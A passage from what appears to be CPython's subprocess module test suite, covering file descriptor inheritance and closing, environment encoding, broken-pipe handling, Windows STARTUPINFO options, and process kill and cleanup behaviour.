skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
ZERO_RETURN_CMD,
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process
env['LC_ALL'] = 'C'
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(ZERO_RETURN_CMD[0])
args = list(ZERO_RETURN_CMD[1:])
path, program = os.path.split(ZERO_RETURN_CMD[0])
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program]+args)
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'%s' %s" % (abs_program, " ".join(args).encode("utf-8"))
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program]+args, env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program]+args, env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
ZERO_RETURN_CMD,
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
# bpo-32270: Ensure that descriptors specified in pass_fds
# are inherited even if they are used in redirections.
# Contributed by @izbyshev.
def test_pass_fds_redirected(self):
"""Regression test for https://bugs.python.org/issue32270."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
pass_fds = []
for _ in range(2):
fd = os.open(os.devnull, os.O_RDWR)
self.addCleanup(os.close, fd)
pass_fds.append(fd)
stdout_r, stdout_w = os.pipe()
self.addCleanup(os.close, stdout_r)
self.addCleanup(os.close, stdout_w)
pass_fds.insert(1, stdout_w)
with subprocess.Popen([sys.executable, fd_status],
stdin=pass_fds[0],
stdout=pass_fds[1],
stderr=pass_fds[2],
close_fds=True,
pass_fds=pass_fds):
output = os.read(stdout_r, 1024)
fds = {int(num) for num in output.split(b',')}
self.assertEqual(fds, {0, 1, 2} | frozenset(pass_fds), f"output={output!a}")
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen(ZERO_RETURN_CMD,
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = import_helper.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with warnings_helper.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
if mswindows:
# subprocess._active is not used on Windows and is set to None.
self.assertIsNone(subprocess._active)
else:
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError) as err:
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
False, [], 0, -1,
func)
# Attempt to prevent
# "TypeError: fork_exec() takes exactly N arguments (M given)"
# from passing the test. More refactoring to have us start
# with a valid *args list, confirm a good call with that works
# before mutating it in various ways to ensure that bad calls
# with individual arg type errors raise a typeerror would be
# ideal. Saving that for a future PR...
self.assertNotIn('takes exactly', str(err.exception))
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True,
None, None, None, -1,
None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen(ZERO_RETURN_CMD)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = ZERO_RETURN_CMD
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
support.wait_process(proc.pid, exitcode=0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(proc.pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
def test_send_signal_race(self):
# bpo-38630: send_signal() must poll the process exit status to reduce
# the risk of sending the signal to the wrong process.
proc = subprocess.Popen(ZERO_RETURN_CMD)
# wait until the process completes without using the Popen APIs.
support.wait_process(proc.pid, exitcode=0)
# returncode is still None but the process completed.
self.assertIsNone(proc.returncode)
with mock.patch("os.kill") as mock_kill:
proc.send_signal(signal.SIGTERM)
# send_signal() didn't call os.kill() since the process already
# completed.
mock_kill.assert_not_called()
# Don't check the returncode value: the test reads the exit status,
# so Popen failed to read it and uses a default returncode instead.
self.assertIsNotNone(proc.returncode)
def test_send_signal_race2(self):
# bpo-40550: the process might exist between the returncode check and
# the kill operation
p = subprocess.Popen([sys.executable, '-c', 'exit(1)'])
# wait for process to exit
while not p.returncode:
p.poll()
with mock.patch.object(p, 'poll', new=lambda: None):
p.returncode = None
p.send_signal(signal.SIGTERM)
def test_communicate_repeated_call_after_stdout_close(self):
proc = subprocess.Popen([sys.executable, '-c',
'import os, time; os.close(1), time.sleep(2)'],
stdout=subprocess.PIPE)
while True:
try:
proc.communicate(timeout=0.1)
return
except subprocess.TimeoutExpired:
pass
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_startupinfo_copy(self):
# bpo-34044: Popen must not modify input STARTUPINFO structure
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
startupinfo.wShowWindow = subprocess.SW_HIDE
# Call Popen() twice with the same startupinfo object to make sure
# that it's not modified
for _ in range(2):
cmd = ZERO_RETURN_CMD
with open(os.devnull, 'w') as null:
proc = subprocess.Popen(cmd,
stdout=null,
stderr=subprocess.STDOUT,
startupinfo=startupinfo)
with proc:
proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(startupinfo.dwFlags,
subprocess.STARTF_USESHOWWINDOW)
self.assertIsNone(startupinfo.hStdInput)
self.assertIsNone(startupinfo.hStdOutput)
self.assertIsNone(startupinfo.hStdError)
self.assertEqual(startupinfo.wShowWindow, subprocess.SW_HIDE)
self.assertEqual(startupinfo.lpAttributeList, {"handle_list": []})
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with warnings_helper.check_warnings((".*overriding close_fds",
RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call(ZERO_RETURN_CMD,
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbot raises EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
